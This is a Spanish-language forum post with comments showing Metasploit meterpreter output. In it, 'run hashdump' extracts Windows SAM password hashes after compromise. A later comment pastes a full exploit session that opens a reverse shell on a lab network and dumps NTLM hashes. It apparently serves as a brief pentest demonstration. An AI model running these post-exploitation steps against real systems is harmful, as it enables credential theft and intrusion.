penetration win hasdump | msf

Publicado el 06/11/2011 12:11:00 en Seguridad.
Author: [x][x] zer0max | Total de votos: 3   Vote



meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM



meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 3ed7[...]
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...



Administrator:500:aad3b435b51404eeaad3b435b51404ee:...
Guest:501:aad3b435b51404eeaad3b435b51404ee:...
HelpAssistant:1000:ce909bd50f46021bf4aa40680422f646:...
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:...::

Comments:


[x]
[x][x] incid3nt (11 y) : 55081 Buenas, no soy un practicante del Ethical Hacking (No Pentest, only networking and programming) XD ...

No suelo usar el Metasploit, pero me parece un aporte interesante, no conocia "hashdump", ¿Para sistemas *nix funciona?


[x]
[x][x] hendrox (11 y) : 55085 que es lo que hace el hashdump .


[x]
[x][x] Virtux (11 y) : 55093 Nose porque pero me parece mejor usar el OphCrack, que es un live y es mucho mas simplificado. De todas formas estaria bueno que pongas bien porque lo que veo es lo que hay en consola, estaria bueno que expliques eso.


[x]
[x][x] demoniaco (11 y) : 55095 tampoco conocia ese comando!!! Gracias por la información!!


[x]
[x][x] demoniaco (11 y) : 55096 Crea que hay varias opciones...Esa seria una alternativa, de acuerdo al criterio de cada uno utilizar el que mejor le beneficie!!!


[x]
[x][x] zer0max (11 y) : 55097 resulta que ese comando que se ejecuta cuando uno ya ha penetrado un sistema windows con un exploit 'x' con metasploit.Lo que haces hacer un dump o copia de los usuarios y passwords del sistema SAM de windows.
Gracias a todos por sus comentarios.


[x]
[x][x] zer0max (11 y) : 55098 Osea tienen que primero haber obtenido una session en el sistema mediante metasploit y luego ejecutar el comando.

Saludos brothers


[x]
[x][x] zer0max (11 y) : 55100 [*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes) to 192.168.186.129
[*] Meterpreter session 1 opened (192.168.186.1:4444 -> 192.168.186.129:1037) at
2011-11-07 15:47:54 -0700

meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY f7**********************************...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...


Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c08
9c0:::
Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::
:
Asistente de ayuda:1000:9c8a0569c95978e0804462f8e330890d:4ab9c3a452f249426e5de4f
c7b2b0838:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:fddadcc12c6d4c6f4fec0c7d0
100d829:::




[x]
[x][x] javamain (11 y) : 55445 Exelente zero muy interesante, Yo uso Bt5r, Y cuenta con esa tool, mas no eh usado hashdump, lo usare carnal. animo saludos un abrazo.
buenas noches